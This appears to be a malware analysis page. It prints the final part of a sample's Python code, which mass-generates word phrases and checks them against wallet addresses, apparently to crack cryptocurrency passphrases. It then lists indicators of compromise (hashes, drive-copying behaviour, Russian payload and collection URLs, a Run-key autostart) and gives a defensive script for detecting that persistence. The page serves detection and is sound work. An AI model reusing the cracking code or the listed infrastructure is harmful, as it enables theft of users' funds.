                        words2 = set.intersection(*[ words[1 - p][w][p] for p, w in enumerate([word1, word0][:d]) ])
                        words2 = choices({word: len(set.intersection(*[ words[2 - p][w][p] for p, w in enumerate([word, word1, word0][:d]) ])) for word in words2}, len(words2), 0)
                        for j2, word2 in enumerate(words2):
                            words3 = set.intersection(*[ words[2 - p][w][p] for p, w in enumerate([word2, word1, word0][:d]) ])
                            words3 = choices({word: len(set.intersection(*[ words[3 - p][w][p] for p, w in enumerate([word, word2, word1, word0][:d]) ])) for word in words3}, len(words3), 0)
                            for j3, word3 in enumerate(words3):
                                words4 = set.intersection(*[ words[3 - p][w][p] for p, w in enumerate([word3, word2, word1, word0][:d]) ])
                                for j4, word4 in enumerate(words4):
                                    if True:
                                        if True:
                                            if True:
                                                if True:
                                                    phrase = word0 + ' ' + word1 + ' ' + word2 + ' ' + word3 + ' ' + word4
                                                    phrase = phrase.encode('utf8')
                                                    if 10 > len(phrase) > 80:
                                                        continue
                                                    phrases.append(phrase)
                                                    phrases.append(phrase.lower())
                                                    phrases.append(phrase.replace(' ', ''))
                                                    phrases.append(phrase.replace(' ', '').lower())
                                                    if len(phrases) > 500000:
                                                        u += len(phrases)
                                                        process1 = multiprocessing.Process(target=check_addresses, args=(u, t, ver, {phrases.pop() for x in xrange(len(phrases))}, []))
                                                        process1.start()
                                                        process1.join()
        except:
            pass
except:
    pass
sys.exit()
IOC
HASH
EAD9542D757366D77F887173A8EEC810
a7f1d0df5413d14fab8566df4fdde1d9
eeb736d65f89dbabdc5670f801c6d53b
63e104fb8a1906ed70a4baf3f2672a70
File behavior
Creates a photo directory on drives D through M and copies itself into it
Network
http://www.profbase.ru/photo.txt
http://www.psiassess.ru/photo.txt
http://www.topstatist.ru/photo.txt
http://194.147.84.197/python18
cpitest.ru/address.php
catell.ru/address.php
cpitest.ru/phrases.php
Autostart entries
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Startup"="C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\xxx.exe"
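As an added triage example (not part of the original analysis or of the sample's code), the following Python parses .reg export text and flags Run-key values that match the persistence described on this page: the value names Startup and python12, an exe placed directly in Start Menu\Programs, or a path under a photo directory on drives D-M. The sample export, including the OneDrive entry and the D:\photo\file3.exe path, is constructed for illustration.

```python
import re

# Run value names written by the two stages described on this page.
SUSPECT_NAMES = {"startup", "python12"}
RUN_SUFFIX = r"\software\microsoft\windows\currentversion\run"
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
# Path traits from the page: exe directly in Start Menu\Programs, photo dir on D-M.
PATH_TRAITS = [
    ("exe directly in Start Menu\\Programs", re.compile(r"\\start menu\\programs\\[^\\]+\.exe$")),
    ("runs from photo directory on D-M", re.compile(r"^[d-m]:\\photo\\")),
]

# Constructed sample in .reg export format (not taken from a real host).
SAMPLE_REG = r'''
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Startup"="C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\xxx.exe"
"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"
"python12"="D:\\photo\\file3.exe"

[HKEY_CURRENT_USER\Software\Example]
"Startup"="C:\\not\\a\\run\\key.exe"
'''

def parse_reg(text):
    """Yield (key, name, data) for every string value in .reg export text."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and (m := VALUE_RE.match(line)):
            # .reg files escape backslash and double quote with a backslash.
            yield (key,) + tuple(re.sub(r"\\(.)", r"\1", g) for g in m.groups())

def suspicious_run_values(text):
    """Return [(name, data, reasons)] for Run-key values matching the indicators."""
    hits = []
    for key, name, data in parse_reg(text):
        if not key.lower().endswith(RUN_SUFFIX):
            continue
        reasons = ["value name used by sample"] if name.lower() in SUSPECT_NAMES else []
        reasons += [label for label, rx in PATH_TRAITS if rx.search(data.lower())]
        if reasons:
            hits.append((name, data, reasons))
    return hits

if __name__ == "__main__":
    for name, data, reasons in suspicious_run_values(SAMPLE_REG):
        print(name, "->", data, "|", "; ".join(reasons))
```

Files exported by regedit are normally UTF-16, so decode them to text before passing them to `suspicious_run_values`.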